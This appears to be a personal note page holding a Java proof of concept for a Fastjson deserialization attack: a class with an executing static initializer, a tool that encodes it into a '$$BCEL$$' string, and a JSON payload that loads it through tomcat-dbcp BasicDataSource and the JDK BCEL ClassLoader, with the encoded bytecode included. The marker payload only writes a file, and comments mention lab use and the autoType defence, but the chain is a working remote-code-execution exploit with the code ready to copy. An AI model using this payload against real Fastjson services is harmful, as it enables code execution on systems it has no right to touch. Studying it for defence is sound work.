只是做个记录
Evil.java
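import java.io.IOException;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Paths;

/**
 * Proof-of-concept class whose only purpose is its static initializer: it runs
 * the moment the class is initialised, which is what the rest of this page
 * exercises (BCEL.java encodes this class, FastjsonTest.java loads it through
 * the BCEL ClassLoader). The file write is a harmless marker that proves the
 * initializer executed; nothing else is touched.
 *
 * NOTE(review): the marker path is Windows-specific. On other platforms the
 * write either fails (reported on stderr) or lands in a relative file whose
 * name contains the backslashes. Run this only in an isolated lab.
 *
 * An earlier variant spawned a process from the initializer
 * (Runtime.getRuntime().exec("calc.exe")); the file write is used instead as a
 * quieter, reversible indicator.
 */
public class Evil {

    /** Marker file written when the class is initialised (Windows path). */
    private static final String MARKER_PATH = "D:\\hello.txt";

    /** Content written into the marker file. */
    private static final String MARKER_CONTENT = "hello,world.\n";

    static {
        try {
            // Files.write creates or truncates the file and always closes it.
            // The original opened a FileOutputStream, swallowed a failed open
            // and then dereferenced the null stream; a single try avoids that.
            // Explicit charset: getBytes() without one uses the platform default.
            Files.write(Paths.get(MARKER_PATH), MARKER_CONTENT.getBytes(StandardCharsets.UTF_8));
        } catch (IOException e) {
            // Best-effort marker: report the failure but never let class
            // initialisation itself fail (that would mask the PoC result).
            e.printStackTrace();
        }
    }
}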
BCEL.java
import com.sun.org.apache.bcel.internal.Repository;
import com.sun.org.apache.bcel.internal.classfile.JavaClass;
import com.sun.org.apache.bcel.internal.classfile.Utility;
import com.sun.org.apache.bcel.internal.util.ClassLoader;
import java.io.IOException;

/**
 * Encodes Evil.class into the "$$BCEL$$" string form understood by the JDK's
 * bundled BCEL ClassLoader, prints it (this is the value pasted into the
 * Fastjson payload), then loads it once locally to confirm that the encoded
 * class is well-formed and that Evil's static initializer fires.
 *
 * NOTE(review): com.sun.org.apache.bcel.internal.* is a JDK-internal copy of
 * BCEL. This compiles and runs only on JDK 8 builds that still ship
 * util.ClassLoader (it was removed in 8u251 and is not accessible in 9+);
 * confirm against the target JDK before relying on the output.
 */
public class BCEL {

    /** Prefix that makes BCEL's ClassLoader decode the remainder as class bytes. */
    private static final String BCEL_PREFIX = "$$BCEL$$";

    public static void main(String[] args)
            throws IOException, ClassNotFoundException, IllegalAccessException, InstantiationException {
        String encoded = BCEL_PREFIX + encodeClass(Evil.class);
        System.out.println(encoded);

        // loadClass() defines the class from the encoded string; newInstance()
        // forces initialisation, so Evil's static block runs right here.
        Class<?> defined = new ClassLoader().loadClass(encoded);
        defined.newInstance();
    }

    /**
     * Returns the BCEL-encoded bytes of {@code cls} without the "$$BCEL$$" prefix.
     * The {@code true} argument asks Utility.encode to compress the class bytes
     * before encoding them, which keeps the resulting string shorter.
     */
    private static String encodeClass(Class<?> cls) throws IOException, ClassNotFoundException {
        JavaClass parsed = Repository.lookupClass(cls);
        return Utility.encode(parsed.getBytes(), true);
    }
}
执行 BCEL.java：控制台会打印出以 $$BCEL$$ 开头的编码字符串，同时本地加载一次 Evil 以确认其静态代码块会被执行。
FastjsonTest.java：把上一步打印出的 $$BCEL$$ 字符串填入下面 payload 的 driverClassName 字段（该字符串是 Evil.class 字节码的编码，Evil.java 每次重新编译后都需要重新生成）。
import com.alibaba.fastjson.JSON;

/**
 * Drives the Fastjson -> tomcat-dbcp BasicDataSource -> BCEL ClassLoader chain
 * locally. The JSON names org.apache.tomcat.dbcp.dbcp2.BasicDataSource via
 * "@type", hands it com.sun.org.apache.bcel.internal.util.ClassLoader as
 * driverClassLoader and the "$$BCEL$$..." output of BCEL.java as
 * driverClassName. Parsing the document is enough to run Evil's static
 * initializer: no method on the result is ever called.
 *
 * NOTE(review): this depends on (1) a Fastjson version/configuration that still
 * honours "@type" for these classes (autoType), (2) tomcat-dbcp on the classpath
 * and (3) a JDK 8 build that still has the internal BCEL ClassLoader. None of
 * the versions are recorded on this page, so confirm them before relying on it.
 * JSON.parseObject is exactly the point where untrusted input becomes dangerous;
 * the defence is to keep Fastjson current and autoType disabled / safe mode on.
 * Run only in an isolated lab. The encoded class below must be regenerated with
 * BCEL.java whenever Evil.java is recompiled.
 */
public class FastjsonTest {

    /** Output of BCEL.java: Evil.class compressed and encoded for BCEL's loader. */
    private static final String BCEL_ENCODED_EVIL =
            "$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$7dS$d9R$TA$U$3dM$s$990$O$86$EQ$W$RQ$96$EB$o$m$88$ac$ca$92r$J$f0$AE$V$85$_$c30$92$c1$c9L$w$e9$m$7c$91$cf$bc$40$95T$f9$B$7e$94xz$40$96B$9d$87$5e$ce$3d$e7$de$db$a7$7b$7e$fe$fa$fe$D$c0K$y$Zh$c6P$iY$j$c3$G$o$c8$c5$91$d7$f1$c2$40$M$p$3aF$N$c41f$907$ae$90$J$j$af$M$98$K$89aR$c7k$jS$C$b1$Z$d7w$e5$9c$40$q$9d$d9$U$d0$W$83$5dG$mQt$7dg$b5$5e$deq$aa$h$d6$8eG$qU$Ml$cb$db$b4$aa$ae$da_$82$9a$y$b95$81$96$a2$j$94$f3$b5z$c5$a9$96$z$3f$bf$7c$e0z$d3$C$f1$Z$db$bb$cc$z$c8$ed$$$ee$5b$HV$de$N$f2$F$d7sV$DY$I$ea$fe$ee$f2$a1$edT$a4$h$f8$U$b4$5e1$de$af$dd$c4$b5$8a$rK$aa$830$ecY$fe$5e$7e$5dV$5d$7fO$c5$3e$bb$aa$91$fb$b7$92$T$d7$ed$c0$97$8e$_$F$9a$Vc$ad$$$xuI$95c$95$F$3an$b1o$c6$a8lZ$97$96$fde$c5$aa$84g$d41Mo$e9$v$ed$a4$7f$C$c6zP$af$daN$n$y$db$a8$8e$9aS$c9L$q$91$S0$97$a6$3e$95$i$cf$Lr$f2$90$b5$cd$9bu$UeF$m$Z$c6$b3$b5$92$V$f8$96$7b$e4$e6$M$81$b6$7f$f5$a34$b3$C$5d$ff$b5$ce$c4$iRl$d4$c4$3c$de$98x$8b$F$5e$c9_$ac4$b1$a8zL$de$b9$y$9atm$ed$da$ce$bec$cb$5b$d0$85$db$bc$a0$f4$dd$xP$8f$s$99$bem$bf$c2$S$V$86e$e8$e5F$d5$b2iV$7c$cf$91$LG$d2$e1$83$d1$d2$99m6$Z$fdZu$r$p$d1$f4$f6$82$d2Dm$_$a89$e8A$82$cfZ$7d$N$Q$caW$8e$z$dc$e59$L$ce$d1$c1S$88$e30$fc$80c$y$E$e3h$e5h$5e$Q$f0$Q$8fB$ac$ed$8fX$8c$f2$f7$88$S$5bN5$7c$3cCd$8b9$b4b$w$ba$oV$cf$Q$db$g$3a$85$be$fa$N$c6$94$d6$ae$9d$a0q8$7b$C$e3$E$f7$ae$90$a6$e1$T$dc$bf$de$j3Y$S$j$e8b$89$5ed$d9$99$89$JLa$96s$ql$aa$c08XX$edL$b6$93$60CI$b4S$f3$98$aa$Ot$a3$93$ca$t$d4$f6P$dd$8d$R$3ce$86$5e$e6$Y$60$96$3e$ded$3f$96$90$J$P$f5$O$3a$Z$d1P$ad$91$a9V$9d$5c$cd_$ad$o$bct$95W$Z0$c9$ac$dd$3ct$C$e3$cc$d9E$93$92$Yc$95gd$3d$t$p$83$d89aMG$af$8e$bep$ec$87$d01$Q$fb$a0$p$j$xp8$a7$a7$ea$T$q$x$97$H$7f$D$5e$f56fq$E$A$A";

    public static void main(String[] args) {
        // Parsing alone triggers the chain; the returned object is not used.
        JSON.parseObject(buildPayload());
    }

    /**
     * Assembles the JSON document byte-for-byte as in the original listing.
     * The BasicDataSource sits inside an object that is used as a *key*
     * ({...}:"xxx"). Presumably Fastjson stringifies that key object, which
     * invokes the data source's getters and so resolves driverClassName through
     * driverClassLoader -- confirm against the Fastjson version in use.
     */
    private static String buildPayload() {
        StringBuilder doc = new StringBuilder();
        doc.append("{\n");
        doc.append(" {\n");
        doc.append(" \"aaa\": {\n");
        doc.append(" \"@type\": \"org.apache.tomcat.dbcp.dbcp2.BasicDataSource\",\n");
        doc.append(" \"driverClassLoader\": {\n");
        doc.append(" \"@type\": \"com.sun.org.apache.bcel.internal.util.ClassLoader\"\n");
        doc.append(" },\n");
        doc.append(" \"driverClassName\": \"").append(BCEL_ENCODED_EVIL).append("\"\n");
        doc.append(" }\n");
        doc.append(" }:\"xxx\"\n");
        doc.append("}");
        return doc.toString();
    }
}